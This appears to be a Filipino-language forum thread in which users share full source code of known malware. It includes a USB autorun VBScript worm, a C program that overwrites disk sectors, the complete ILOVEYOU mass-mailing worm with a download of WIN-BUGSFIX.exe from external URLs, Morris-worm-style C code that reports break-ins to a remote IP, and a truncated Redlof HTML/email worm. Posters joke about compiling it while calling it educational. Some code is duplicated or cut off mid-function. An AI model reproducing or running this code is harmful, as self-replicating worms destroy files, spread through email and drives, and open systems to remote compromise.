DO NOT COMPILE or you'll be sorry!!!
TAGA LIPA ARE! (vbScript)


'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,che ck,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\FS6519″,winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

simple code pero malakas!!!
Bomber.c

#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}

the legendary, I LOVE YOU VIRUS

filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / = ispyder {AT} mail.com / {AT} GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"

regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT/WIN-BUGSFIX.exe";

elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe";

elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe";

elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy 7thjg/WIN-BUGSFIX.exe

"

end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"

regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or
(ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or

(s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if
mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com";
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"

scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"

end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME= {AT} - {AT} Generator {AT} - {AT}
CONTENT= {AT} - {AT} BAROK VBS - LOVELETTER {AT} - {AT} >"&vbcrlf& _
"<META NAME= {AT} - {AT} Author {AT} - {AT} CONTENT= {AT} - {AT} spyder ?-? ispyder {AT} mail.com ?-? {AT} GRAMMERSoft
Group ?-? Manila, Philippines ?-? March 2000 {AT} - {AT} >"&vbcrlf& _
"<META NAME= {AT} - {AT} Description {AT} - {AT} CONTENT= {AT} - {AT} simple but i think this is
good... {AT} - {AT} >"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT= {AT} - {AT} window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#) {AT} - {AT}

"&vbcrlf& _
"ONKEYDOWN= {AT} - {AT} window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#) {AT} - {AT}

BGPROPERTIES= {AT} - {AT} fixed {AT} - {AT} BGCOLOR= {AT} - {AT} #FF9933 {AT} - {AT} >"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this
HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP= {AT} - {AT} infinite {AT} - {AT}
BGCOLOR= {AT} - {AT} yellow {AT} - {AT} >----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language= {AT} - {AT} JScript {AT} - {AT} >"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE= {AT} - {AT} VBScript {AT} - {AT} >"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject( {AT} - {AT} Scripting.FileSystemObject {AT} - {AT} )"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} )"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} )) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write {AT} - {AT} ERROR: can#-#t initialize ActiveX {AT} - {AT} "&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject( {AT} - {AT} WScript.Shell {AT} - {AT} )"&vbcrlf& _
"regedit.RegWrite
{AT} - {AT} HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32 {AT} - {AT} ,dirsystem& {AT} - {AT} ^-^MSKernel32.vbs {AT} - {AT} "&vbcrlf&

_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

:what:

ang haba nung I LOVE YOU Virus. :wow:

pati pala sa mIRC nagawa nyang ipa-spread yun. :wow:

eto pala source code nila, hanep nadale ako nyang taga lipa are.

buti na lang konti lang nakakaalam kung anong language ginamit dyan ;)

(pag may nakakaalam, wag sabihin. mamaya mapagtripan at icompile yan :slap:)

nyahaha... la na ba? wahehehe

yung i love you dali lang i-compile yan:giggle:

dahil sa source code ng I LOVE YOU virus. medyo natuto rin ako ng konti:giggle:

mga tsongs, for educational pupose lang to ok... wag nyong tangkain pang i compile to sa bahay or sa school kasi kayo rin ang maaapektuhan...

worm.c

666 The Dead Zone 214-522-5321 300/1200/2400 666

#include

#include

#include

#include



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

int argc;

char *argv[];



{

int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) {

parent = atoi (argv[++n]);

n++;

}

else {

/* check for 1l.c in argument list */

if (!strncmp(argv([n], "1l.c", 4))

okay = 1;

/* load an object file into memory */

load_object (argv[n];

/* clean up by unlinking file */

if (parent)

unlink (argv[n]);

/* and removing object file name */

strcpy (argv[n++], "");

}



}

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);

/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}



int

doit()

{

current_time = time (0);

/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ()

/* attempt to send byte to "ernie" */

send_message ()

for (;;) {

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork())

/* parent exits, new worm continues */

exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120);

/* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) {

reset_hosts();

current_time = time(0); }

/* quit if pleasequit is set, and nextw>10 */

if (pleasequit && nextw > 10)

exit (0);

}

}

alt + f4 compile nyo nga wehehe

mga tsongs, for educational pupose lang to ok... wag nyong tangkain pang i compile to sa bahay or sa school kasi kayo rin ang maaapektuhan...

worm.c

666 The Dead Zone 214-522-5321 300/1200/2400 666

#include

#include

#include

#include



long current_time;

struct rlimit no_core = {0,0};



int

main (argc, argv)

int argc;

char *argv[];



{

int n;

int parent = 0;

int okay = 0;

/* change calling name to "sh" */

strcpy(argv[0], "sh");

/* prevent core files by setting limit to 0 */

setrlimit(RLIMIT_CORE, no_core);

current_time = time(0);

/* seed random number generator with time */

srand48(current_time);

n = 1;

while (argv[n]) {

/* save process id of parent */

if (!strncmp(argv[n], "-p", 2)) {

parent = atoi (argv[++n]);

n++;

}

else {

/* check for 1l.c in argument list */

if (!strncmp(argv([n], "1l.c", 4))

okay = 1;

/* load an object file into memory */

load_object (argv[n];

/* clean up by unlinking file */

if (parent)

unlink (argv[n]);

/* and removing object file name */

strcpy (argv[n++], "");

}



}

/* if 1l.c was not in argument list, quit */

if (!okay)

exit (0);

/* reset process group */

setpgrp (getpid());

/* kill parent shell if parent is set */

if (parent)

kill(parent, SIGHUP);

/* scan for network interfaces */

if_init();

/* collect list of gateways from netstat */

rt_init();

/* start main loop */

doit();

}



int

doit()

{

current_time = time (0);

/* seed random number generator (again) */

srand48(current_time);

/* attack gateways, local nets, remote nets */

attack_hosts();

/* check for a "listening" worm */

check_other ()

/* attempt to send byte to "ernie" */

send_message ()

for (;;) {

/* crack some passwords */

crack_some ();

/* sleep or listen for other worms */

other_sleep (30);

crack_some ();

/* switch process id's */

if (fork())

/* parent exits, new worm continues */

exit (0);

/* attack gateways, known hosts */

attack_hosts();

other_sleep(120);

/* if 12 hours have passed, reset hosts */

if(time (0) == current_time + (3600*12)) {

reset_hosts();

current_time = time(0); }

/* quit if pleasequit is set, and nextw>10 */

if (pleasequit && nextw > 10)

exit (0);

}

}

pwede bang i-compile ito with TC? saka bakit puro #include lang?

eto pala source code nila, hanep nadale ako nyang taga lipa are.



ako rin.... :upset:

pwede bang i-compile ito with TC? saka bakit puro #include lang?

yep, pansin ko rin...

matanong ko lang, since hindi ko pa naencounter ito, anong klaseng payload (destruction) ang ginagawa nito? :naughty:

OT: everytime pumupunta ako sa thread na ito, nahahyper ang NOD32 ko :lmao:

pwede bang i-compile ito with TC? saka bakit puro #include lang?

na decompile ko lang kasi yan sa school namin eh at yan lang ang lumabas... isa lang yan sa mga versions ng worm.c... meron ding apache-worm.c & meron din naman para sa Linux OS para di naman sila ma left out... :dance:


yep, pansin ko rin...

matanong ko lang, since hindi ko pa naencounter ito, anong klaseng payload (destruction) ang ginagawa nito? :naughty:

OT: everytime pumupunta ako sa thread na ito, nahahyper ang NOD32 ko :lmao:

nag rereplicate lang sya sa lahat ng network or systems...

eto naman ang Dover Worm.C

Dover Worm is a worm that can harm your system. With a help of Dover Worm, a hacker can get remote access to your computer


/* dover */

#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

extern errno;
extern char *malloc();

int pleasequit; /* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;

object objects[69]; /* Don't know how many... */

object *getobjectbyname();

char *XS();

main(argc, argv) /* 0x20a0 */
int argc;
char **argv;
{
int i, l8, pid_arg, j, cur_arg, unused;
long key; /* -28(fp) */
struct rlimit rl;

l8 = 0; /* Unused */

strcpy(argv[0], XS("sh")); /* <env+52> */
time(&key);
srandom(key);
rl.rlim_cur = 0;
rl.rlim_max = 0;
if (setrlimit(RLIMIT_CORE, &rl))
;
signal(SIGPIPE, SIG_IGN);
pid_arg = 0;
cur_arg = 1;
if (argc > 2 &&
strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
pid_arg = atoi(argv[2]);
cur_arg += 2;
}
for(i = cur_arg; i < argc; i++) { /* otherwise <main+286> */
if (loadobject(argv[i]) == 0)
exit(1);
if (pid_arg)
unlink(argv[i]);
}
if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
exit(1);
if (pid_arg) {
for(i = 0; i < 32; i++)
close(i);
unlink(argv[0]);
unlink(XS("sh")); /* <env+63> */
unlink(XS("/tmp/.dumb")); /* <env+66>"/tmp/.dumb"
*/
}

for (i = 1; i < argc; i++)
for (j = 0; argv[i][j]; j++)
argv[i][j] = '\0';
if (if_init() == 0)
exit(1);
if (pid_arg) { /* main+600 */
if (pid_arg == getpgrp(getpid()))
setpgrp(getpid(), getpid());
kill(pid_arg, 9);
}
mainloop();
}

static mainloop() /* 0x2302 */
{
long key, time1, time0;

time(&key);
srandom(key);
time0 = key;
if (hg() == 0 && hl() == 0)
ha();
checkother();
report_breakin();
cracksome();
other_sleep(30);
while (1) {
/* Crack some passwords */
cracksome();
/* Change my process id */
if (fork() > 0)
exit(0);
if (hg() == 0 && hi() == 0 && ha() == 0)
hl();
other_sleep(120);
time(&time1);
if (time1 - time0 >= 60*60*12)
h_clean();
if (pleasequit && nextw > 0)
exit(0);
}
}

static trans_cnt;
static char trans_buf[NCARGS];

char *XS(str1) /* 0x23fc */
char *str1;
{
int i, len;
char *newstr;
#ifndef ENCYPHERED_STRINGS
return str1;
#else
len = strlen(str1);
if (len + 1 > NCARGS - trans_cnt)
trans_cnt = 0;
newstr = &trans_buf[trans_cnt];
trans_cnt += 1 + len;
for (i = 0; str1[i]; i++)
newstr[i] = str1[i]^0x81;
newstr[i] = '\0';
return newstr;
#endif
}

/* This report a sucessful breakin by sending a single byte to "128.32.137.13"
* (whoever that is). */

static report_breakin(arg1, arg2) /* 0x2494 */
{
int s;
struct sockaddr_in sin;
char msg;

if (7 != random() % 15)
return;

bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = REPORT_PORT;
sin.sin_addr.s_addr = inet_addr(XS("128.32.137.13"));
/* <env+77>"128.32.137.13" */

s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
return;
if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
;
close(s);
}

/* End of first file in the original source.
* (Indicated by extra zero word in text area.) */

/*
* Local variables:
* compile-command: "make"
* comment-column: 48
* End:
*/

html.redlof.a

Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FS O,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Ou tlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\O utlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\C ommon\MailSettings\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\Kernel32",StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHan dlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function

Function KJLikeIt()
If InWhere <> "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) <> "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder(ThisLocation)
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
